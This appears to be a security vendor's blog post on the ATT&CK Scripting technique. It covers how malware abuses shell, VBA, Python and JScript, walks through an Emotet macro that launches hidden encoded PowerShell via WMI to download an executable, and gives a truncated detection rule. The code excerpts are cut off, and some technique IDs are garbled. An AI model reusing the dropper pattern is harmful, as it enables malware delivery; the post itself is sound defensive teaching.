In 2019, Picus Labs analyzed 48813 malware to determine tactics, techniques, and procedures (TTPs) used by adversaries in these malicious files. Picus Labs categorized each observed TTP by utilizing the MITRE ATT&CK® framework. As a result of the present research, 445018 TTPs observed in the last year were mapped to ATT&CK to identify the top 10 most common techniques used by attackers. Our research has found that Scripting was the sixth most prevalent ATT&CK technique used by adversaries in their malware.
A script
is a set of codes written in a scripting language such as AppleScript, PowerShell, Python, Unix Shells (bash, sh and others), VBScript, and JavaScript/JScript. Legitimate users like system administrators and programmers use scripting
to accelerate operational tasks by automating them in scripts. Adversaries also use scripts to automate multiple actions. Our research has found that Scripting
was the sixth most prevalent ATT&CK technique used by adversaries in their malware.
Introduction
A script
is an ordered set of commands written in a scripting language. A scripting language is an interpreted programming language that executes scripts without compiling. Not only legitimate users but also adversaries use Scripting to automate long tasks and execute codes that include multiple actions. Some scripting languages like PowerShell
and VBScript
in Windows systems and Unix shells
in Unix based systems and AppleScript
in macOS can interact directly with the operating system at an API, so they can be used by adversaries to bypass weak process monitoring mechanisms.
In this article, we review:
- the fundamentals of the Scripting technique
- updates on the technique in the new version of the ATT&CK framework
- sub-techniques derived from the Scripting technique
- its use cases by threat actors and malware
- red and blue team exercises for this technique
Changes in the New Version of the MITRE ATT&CK Framework
The July 2020 (v7) ATT&CK release is the first non-beta release of Enterprise ATT&CK represented with sub-techniques
[1]. MITRE ATT&CK Sub-techniques are a way to describe a specific implementation of a technique in more detail.
In the new sub-technique version of the MITRE ATT&CK Framework, the T1064 Scripting
technique is deprecated. However, it was not completely removed in the new version. The Scripting technique is split into separate T1059.004 Unix Shell
, T1059.005 Visual Basic
, T1059.006 Python
, and T1059.007 JavaScript/Jscript
sub-techniques of T1059 Command and Scripting Interpreter
.
Command and Scripting Interpreter Sub-techniques
The first three sub-techniques of the Command and Scripting Interpreter technique, T1059.001 PowerShell, T1059.002 AppleScript, and T1059.003 Windows Command Shell, were explained in our Command-Line Interface blog post. Command Line Interface was the sixth most prevalent ATT&CK technique according to our 10 Critical ATT&CK Technique research. Although these three techniques are also scripting languages, they were not included in the Scripting technique of the previous ATT&CK version, since they were stand-alone techniques.
In this blog post, we describe four other sub-techniques that are derived from the Scripting technique.
- T1059.004 Unix Shell
Unix shell is the primary command-line interpreter that provides a command-line interface (CLI) for Unix based operating systems (OS) such as macOS, Linux, and BSD. The Bourne Shell (sh), Bourne-Again Shell (bash), Z Shell (zsh), Korn Shell (ksh), and Secure Shell (SSH) are the most commonly used Unix shells.
In addition to an interactive CLI, The Unix shell also provides a scripting language to control the execution of the OS using shell scripts. Basically, a shell script is a set of commands that are in the execution order. The Unix shell can control any part of the system and support typical programming concepts such as conditional tests, loops, file operations, variables, and functions.
Since Unix shells are powerful and flexible tools that execute commands and control the system, adversaries use Unix shells to execute various commands and malicious payloads. Moreover, they control remote systems with SSH during the lateral movement and command and control phases. Some use cases of Unix shells in malware:
- to execute multiple commands on victims:
- macOS Bundlore adware [2], Derusbi malware [3], Linux/Exaramel backdoor [4]
- to create a reverse shell:
- CallMe OSX Trojan [5], Chaos backdoor [6], Cointicker macOS cryptocurrency ticker [7]
- to start/stop OS services and installed applications:
- LoudMiner cross-platform cryptocurrency miner [8], WindTail OSX backdoor [9]
- download additional payloads:
- Shlayer macOS malware [9], [10], Skidmap cryptocurrency miner [11]
- to execute multiple commands on victims:
- T1059.005 Visual Basic
- Visual Basic for Applications (VBA): VBA is an implementation of the Visual Basic language that provides process automation, Windows API access, and other low-level functionality through DLLs. Including Office for macOS, it is included in most Microsoft Office applications. As a common malicious usage scenario, adversaries embed their malicious codes in VBA macros in Microsoft Office files, then sends these malicious files as email attachments to victims (MITRE ATT&CK T166.001 Spearphishing Attachment)
- VBScript (Microsoft Visual Basic Scripting Edition):VBScript is a derivative of Visual Basic that enables the user to control many aspects of the system by using COM. Although VBScript initially targeted web developers by providing web client scripting in Internet Explorer and web server scripting in IIS, it gained support from Windows system administrators and adversaries because of its extensive functionality. For example, in a malware campaign revealed in March 2020, an obfuscated VBScript package was used to drop various malware such as Zloader, Ursnif, Qakbot, and Dridex [16]. The initial access vector is an email that contains a zipped VBScript file (.vbs) that appeared to be an invoice.
- T1059.006 Python
Python is a popular high-level interpreted programming language. Since Python interpreters are available for the most of the operating systems and it has a comprehensive standard library that can perform many functions, adversaries use Python to execute commands, download payloads and perform various malicious behaviors. Threat actors create not only malware but also vulnerability exploit tools with Python.
Python can be executed in multiple ways:
- interactively from the command-line interface (CLI)
- via Python scripts (.py)
- via binary executables created by compilation of Python code
One of the most recent Python-based malware is the PoetRAT remote access trojan (RAT) [17]. Briefly, it uses a Word document that contains a VBA script to drop a ZIP file. Then, the VBA macro unzips the zip file and executes the PoetRAT, which is a Python script. The zip file also contains a Python interpreter because Windows has no default Python interpreter. - T1059.006 JavaScript/JScript
JavaScript (JS) is a high-level ad multi-paradigm programming language that supports event-driven, functional, and imperative programming styles. JavaScript conforms to the
ECMAScript
specification, which is a standard for the interoperability of Web pages across different browsers. In fact,ECMAScript
is the official name of the JavaScript language [18].Jscript
is Microsoft’s implementation of theECMAScript
language specification [19]. It is an interpreted scripting language as most of the scripting languages.In most cases, adversaries use
JScript
to develop droppers/downloaders to install/download the actual malware [20], [21]. They use heavy obfuscation methods on .js files that can evade static AV signatures [20], [21]. In some cases, adversaries use VBA andJScript
together in their malware likeTrickBot
[22].
Red and Blue Team Exercises
Red Teaming - How to simulate?
In this exercise, we explain a real VBA code that was used by Emotet malware. We analyzed this payload in our following blog posts:
- Emotet Technical Analysis - Part 1 Reveal the Evil Code
- Emotet Technical Analysis - Part 2 PowerShell Unveiled
This payload was included in the following Word document:
MD5: 515f13034bc4ccf635b026722fd5ef9c |
Researchers identified Emotet for the first time in 2014 as a banking malware stealing sensitive and private information. Now, adversaries are using Emotet as Infrastructure as a Service (IaaS) for delivering malware, including other banking Trojans. Emotet incorporated various obfuscation and evasion techniques to avoid detection in its payload.
Briefly, the VBA code embedded in the Word document executes an encoded PowerShell command using WMI, then the PowerShell code downloads a second payload of Emotet. Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on Windows-based operating systems [23].
Do While GetObject(winmgmtS:win32_Process).Create Loop |
Let’s split and analyze the command:
Do While GetObject(winmgmtS:win32_Process).Create()
: In theDo While
loop, theCreate
method of theWMI
’sWin32_Process class
is used to create a new process. The first variable of this method is theCommandLine
code to execute, which is aPowerShell
command in this code.Powershell -w hidden
: There is not a parameter named-w
according to the officialPowerShell
documentation [24]. In fact, the-w
parameter is completed byPowerShell
as the -WindowStyle
parameter because of the parameter substring completion feature ofPowerShell
. Adversaries commonly use the -WindowStyle parameter withHidden
value in maliciousPowerShell
commands to avoid detection.-en:
Similar to-w
, there is not a parameter named-en
, according to the official PowerShell documentation [24]. The-en
parameter is completed as -EncodedCommand parameter byPowerShell
.-EncodedCommand
accepts a base-64-encoded string version of a command. Therefore, we must usebase64
decoding to reveal thePowerShell
command.
We’ll get the following code after base64
decoding, removing garbage variables, backtick (`
), and plus (+
) characters, and putting values of variables and beautifying the code. You can read the details of these de-obfuscation process in our blog post [25].
$list=( |
Briefly, this code tries to download a file from the URLS included in the $list
array in the given order via the Net.WebClient.DownloadFile
method and saves the downloaded file to the $env:userprofile
directory as 937.exe
.
In conclusion, the VBA code given in this exercise incorporates following MITRE ATT&CK techniques:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1047 Windows Management Instrumentation
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1564.003 Hide Artifacts: Hidden Window
- T102 Obfuscated Files or Information
Blue Teaming - How to detect?
The following Sigma rule can be used to detect WMI DLLs loaded via VBA Macros in Word, Excel, PowerPoint and Outlook files:
title:
|
References
[1] “Updates - July 2020.” [Online]. Available: https://attack.mitre.org/resources/updates/updates-july-2020/. [Accessed: 10-Aug-2020] [2] O. Sushko, “macOS Bundlore: Mac Virus Bypassing macOS Security Features,” 17-Apr-2019. [Online]. Available: https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis. [Accessed: 11-Aug-2020] [3] “Website.” [Online]. Available: https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf. [Accessed: 11-Aug-2020] [4] “New TeleBots backdoor: First evidence linking Industroyer to NotPetya,” 11-Oct-2018. [Online]. Available: https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/. [Accessed: 11-Aug-2020] [5] R. Falcone and J. Miller-Osborn, “Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists,” 24-Jan-2016. [Online]. Available: https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/. [Accessed: 11-Aug-2020] [6] S. Feldmann, “Chaos: a Stolen Backdoor Rising Again,” 14-Feb-2018. [Online]. Available: https://www.gosecure.net/blog/2018/02/14/chaos-a-stolen-backdoor-rising/. [Accessed: 11-Aug-2020] [7] T. Reed, “Mac cryptocurrency ticker app installs backdoors,” 29-Oct-2018. [Online]. Available: https://blog.malwarebytes.com/threat-analysis/2018/10/mac-cryptocurrency-ticker-app-installs-backdoors/. [Accessed: 11-Aug-2020] [8] “LoudMiner: Cross‑platform mining in cracked VST software,” 20-Jun-2019. [Online]. Available: https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/. [Accessed: 11-Aug-2020] [9] “Middle East Cyber-Espionage.” [Online]. Available: https://objective-see.com/blog/blog_0x3B.html. [Accessed: 11-Aug-2020] [10] “TAU Threat Intelligence Notification: New macOS Malware Variant of Shlayer (OSX) Discovered,” 12-Feb-2019. [Online]. Available: https://www.carbonblack.com/blog/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/. [Accessed: 11-Aug-2020] [11] T. Micro, “Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload,” 16-Sep-2019. [Online]. Available: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/. [Accessed: 11-Aug-2020] [12] mcleanbyron, “The Component Object Model.” [Online]. Available: https://docs.microsoft.com/en-us/windows/win32/com/the-component-object-model. [Accessed: 11-Aug-2020] [13] “The Windows Native API - TechNet Articles - United States (English) - TechNet Wiki.” [Online]. Available: https://social.technet.microsoft.com/wiki/contents/articles/11831.the-windows-native-api.aspx. [Accessed: 11-Aug-2020] |
[14] “Inter-Process Communication: Component Object Model.” [Online]. Available: https://attack.mitre.org/techniques/T1559/001/. [Accessed: 11-Aug-2020] [15] “Native API.” [Online]. Available: https://attack.mitre.org/techniques/T1106/. [Accessed: 11-Aug-2020] [16] blubracket, “Obfuscated VBScript Drops Zloader, Ursnif, Qakbot, Dridex - Security Boulevard,” 24-Jun-2020. [Online]. Available: https://securityboulevard.com/2020/06/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex/. [Accessed: 11-Aug-2020] [17] W. Mercer, “PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors.” [Online]. Available: http://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html. [Accessed: 12-Aug-2020] [18] “JavaScript Versions.” [Online]. Available: https://www.w3schools.com/js/js_versions.asp. [Accessed: 12-Aug-2020] [19] “JScript (ECMAScript3).” [Online]. Available: https://docs.microsoft.com/en-us/previous-versions/hbxc2t98(v=vs.85). [Accessed: 12-Aug-2020] [20] “Undetected JScript Dropper Installs Sage Ransomware,” 20-Apr-2017. [Online]. Available: https://www.vmray.com/cyber-security-blog/undetected-jscript-dropper-executes-sage-ransomware/. [Accessed: 12-Aug-2020] [21] “[No title].” [Online]. Available: https://file.gdatasoftware.com/web/en/documents/whitepaper/G_DATA_Analysis_Script.Trojan-Downloader.Fodevepdf.A.pdf. [Accessed: 12-Aug-2020] [22] “Deobfuscating Ostap: TrickBot’s 34,000 Line JavaScript Downloader,” 03-Sep-2019. [Online]. Available: https://threatresearch.ext.hp.com/deobfuscating-ostap-trickbots-javascript-downloader/. [Accessed: 12-Aug-2020] [23] stevewhims, “Windows Management Instrumentation.” [Online]. Available: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page. [Accessed: 11-Aug-2020] [24] SteveL-MSFT, “about_PowerShell_exe - PowerShell.” [Online]. Available: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_exe. [Accessed: 11-Aug-2020] [25] S. Özarslan, “Emotet Technical Analysis - Part 2 PowerShell Unveiled.” [Online]. Available: https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled. [Accessed: 12-Aug-2020] |